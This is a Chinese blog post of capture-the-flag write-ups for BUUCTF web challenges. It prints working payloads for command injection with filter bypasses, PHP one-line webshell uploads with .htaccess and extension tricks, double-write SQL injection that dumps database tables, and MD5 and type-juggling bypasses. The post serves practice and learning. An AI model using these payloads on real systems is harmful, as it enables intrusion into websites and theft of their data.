[BUUCTF]web 刷题记录

最新推荐文章于 2022-05-15 13:34:23 发布
最新推荐文章于 2022-05-15 13:34:23 发布
阅读量558 收藏
点赞数 2
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/114003783
版权

[GXYCTF2019]Ping Ping Ping

使用;来拼接多条命令
输入:?ip=127.0.0.1;ls发现有flag.php
在这里插入图片描述
?ip=127.0.0.1;cat index.php应该是过滤了空格,可以用$IFS$1绕过
在这里插入图片描述
读取到index.php,F12看过滤了什么,过滤的很干净
在这里插入图片描述
注意这里:preg_match("/.*f.*l.*a.*g.*/", $ip)这个的意思是匹配到按flag这个顺序的所有字符

在这里插入图片描述
在这里插入图片描述
所以我们不按顺序就好了:
payload:/?ip=127.0.0.1;a=ag;b=fl;cat$IFS$1$b$a.php
在这里插入图片描述

[极客大挑战 2019]Upload

上传一句话木马,改包,直接两个地方一起改
在这里插入图片描述
提示不能有<?这个标签,尝试这样绕过<script language="php">
在这里插入图片描述
在这里插入图片描述
还是不行
在这里插入图片描述
把文件后缀用phtml绕过,再尝试这个GIF <script language="php">eval($_POST[1])</script>
在这里插入图片描述
蚁剑连接,在根目录发现flag

[极客大挑战 2019]BabySQL

万能密码输入,发现or不见了,尝试双写oorr,成功
在这里插入图片描述
盲猜三个字段,直接查回显,发现被过滤,继续双写

1' ununionion selselectect 1,2,3 #

果然!!!
在这里插入图片描述
接下来就是组合拳了
查库名,geek

1' ununionion selselectect 1,database(),3 #

在这里插入图片描述
查表名,发现过滤掉了where和from
在这里插入图片描述
所以再双写一波from和where,发现or过滤了导致information也出错了
在这里插入图片描述
最后获得表名b4bsql

1' ununionion selselectect 1,group_concat(table_name),3 frofromm infoorrmation_schema.tables whwhereere table_schema=database()#

在这里插入图片描述
查询字段

1' ununionion selselectect 1,group_concat(column_name),3 frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql'#

在这里插入图片描述
查询记录发现居然没有flag,猜想估计不在这个库里面,查询一下所有的库名

1' ununionion selselectect 1,group_concat(table_schema),3 frofromm infoorrmation_schema.tables#

明显是这个ctf库
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最后查询记录:

1' ununionion selselectect 1,group_concat(flag),3 frofromm ctf.Flag#

在这里插入图片描述

[ACTF2020 新生赛]Upload

有js阻挠,直接关闭js就行了,上传一句话木马
在这里插入图片描述
开蚁剑拿到flag

[极客大挑战 2019]BuyFlag

打开pay页面,应该是对身份信息有验证
在这里插入图片描述
F12看到了密码的判断条件
在这里插入图片描述
抓包改请求方式为post,他说数字太长了,那就用科学计数法10e10
在这里插入图片描述
拿到flag
在这里插入图片描述

[ACTF2020 新生赛]BackupFile

一看到备份文件我就啪的一下输入了一个index.php.bak,没想到真整出来了哈哈哈,扫描都免了

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

涉及到一个函数intval(),作用是获取变量的整数值
在这里插入图片描述
考察php的弱类型
payload:

?key=123

[BJDCTF2020]Easy MD5

response里面有hint,给出了sql查询语句
在这里插入图片描述
可以发现md5函数第二个参数为true的时候是原始16字符二进制格式
在这里插入图片描述
有sql语句就肯定逃不了sql注入,就是在md5加密后构造出一个or来使判断为真
看别的wp里有现成的捡:
有这两个常见的

129581926211651571912466741651878684928

ffifdyop

在这里插入图片描述
如果要究其源头就是写脚本来跑,为了方便可以直接写php的脚本来跑,我没写,大概思路就是让MD5加密后的密文匹配or这个字符串

第一层payload:ffifdyop

第二层在这里插入图片描述
md5碰撞:?a=s878926199a&b=s155964671a

第三层:
三个等号,数组绕过

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

payload:param1[]=1&param2[]=2
flag得到

[RoarCTF 2019]Easy Calc

源码提示访问calc.php,发现正则过滤

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

不能给num传字母参数,绕过waf的方法是在参数名前面加上空格,在服务器处理url的时候就会自己删去空格
参考
在这里插入图片描述
接下来就目录查询吗,/被过滤,所以要用chr绕过
payload:calc.php? num=print_r(scandir(chr(47)));
在这里插入图片描述
读取flag
payload:? num=file_get_contents(chr(47).f1agg)

[HCTF 2018]admin

随便注册一个登陆进去,发现源代码里面说
在这里插入图片描述
所以就是要伪造admin登陆,一开始我看到可以写post,就以为是存储型xss,但是试过了没有用,继续检索,发现了github上的源码
在这里插入图片描述
不会做。。。

[MRCTF2020]你传你🐎呢

名字够祖安。。
经过burp测试,发现只有后缀为图片格式可以上传
这里学到了一个新的操作

.htaccess文件

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法,
即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,
以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

当.htaccess文件这样写的时候
意思就是把其他类型文件当php解析

SetHandler application/x-httpd-php

也可以这样写
意思是把jpg格式当php解析

AddType application/x-httpd-php .jpg

注意,上传.htaccess的时候filename只能是.htaccess
在这里插入图片描述

在这里插入图片描述
连接蚁剑拿到flag

[GXYCTF2019]BabySQli

在这里插入图片描述

随便登陆一次,看到源代码有一段编码的字符,试了一下是先base32再base64
得到sql语句

select * from user where username = '$name'

过滤了or,但是OR没有
尝试后发现,只有判断用户名为admin的时候才有密码的判断,不然都是wrong user!

查询字段数,发现只有三个字段

admin' ORder by 4#

进行联合注入:admin' union select 1,2,3#,回显是wrong pass
看了wp后,学到一些新的操作
猜测:
猜测题目会将原密码值md5加密后插入数据库
在进行登录的时候会进行逻辑判断:当前输入的密码进行md5加密后是否与数据库里面的相等,如果相等则登陆

由于我们用联合注入的时候,是绕过了md5加密的,所以我们需要把加密后的密文当成密码进行注入

联合注入会新建一条数据,如果引号前还是admin,这存在于数据库的数据就会直接和pass匹配,由于只能有admin来登陆,所以我们可以构造一条记录,name为admin,pass为md5加密后的123,这样就可以了

0' union select 1,'admin','202cb962ac59075b964b07152d234b70'#

密码输入123,这时候就会拿前面这个md5的密文去和123进行加密后的密文匹配,相等则通过

huamanggg
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
2021-01-18
m0_53314778的博客
01-18 417
知识点: BUUCTF web-[极客大挑战 2019]Secret File: 学会运用BrupSuite(抓包,爆破等许多功能): php伪协议 使用php伪协议去读取的原因? 返回审计php代码,发现文件包含,看到了 input (php://input: 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行),这个是伪协议的一种.结合题目一下想到的文件隐藏,于是我们猜测flag在后端文件中,并需要我们去读取他,传入的file经过了过滤,但是没有过滤filter php伪协议中
BUUCTF web题笔记
qq_51637038的博客
08-31 345
Include 点击tips出现 根据题目名称include1猜测是文件包含漏洞 文件包含漏洞常见的方法有: 1.利用include()等函数,通过构造上传特定文件路径,绕过网站对参数的绕过,进入include函数,即可得到所需函数的源码,本题显然没有与include函数相关的线索 2.php伪协议 ①php://input,php://input即获得未经过解析的post参数,此时即可通过构造相应的php文件代码,如一句话木马或system函数查询等方式 发现网站对php:/..
PHP函数 error_reporting(E_ALL ^ E_NOTICE) 说明
weixin_34406796的博客
05-06 376
为什么80%的码农都做不了架构师?>>> ...
CTF_WP:php-MD5碰撞
等风来
10-11 1187
SDUTsec-writeup:MD5碰撞 1.easy MD5-1: 题目链接:easy MD5-1. think carefully &amp;amp;amp;amp;lt;!-- ** if($_POST['param1']!==$_POST['param2'] &amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp; md5($_POST['param1'])===md5($_POST['param2'])){ die(&am
[BUUCTF] 备赛刷题第四天
Dannie01的博客
11-05 1108
[红明谷CTF 2021]write_shell 源码 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }els
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
PHP渗透测试题目笔记
Zeker62的博客
02-10 5331
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2109
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
ctfshow—SSRF详解
cosmoslin的博客
09-24 1250
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
buuctf刷题
qq_41788704的博客
10-28 1616
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
[极客大挑战2021]web wp
cosmoslin的博客
11-26 3936
极客大挑战2021 Welcome2021 F12,提示请使用WELCOME请求方法来请求此网页 burp抓包,修改请求方法,发现f1111aaaggg9.php 再次请求得到flag Dark Tor浏览器访问即可 babysql 查库:babysql uname=-1' union select database(),2,3,4#&pwd=1 查表:jeff,jeffjokes uname=-1' union select group_concat(table_name),2,3,4 fro
ctf刷题小结
quan9i的博客
05-15 5772
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
php-MD5()函数漏洞
qq_42250840的博客
02-26 482
一、数字与字符串之间的比较 var_dump( 0 == "a" ); true var_dump( "0" == "a" );false php把字母开头的字符串转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前的数字。 二、MD5函数漏洞 $_GET['name'] != $_GET['password'] MD5($_GET['name']) == MD5($_...
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3553
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5429
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
buuctf web
08-15
- *2* [【BUUCTF刷题Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值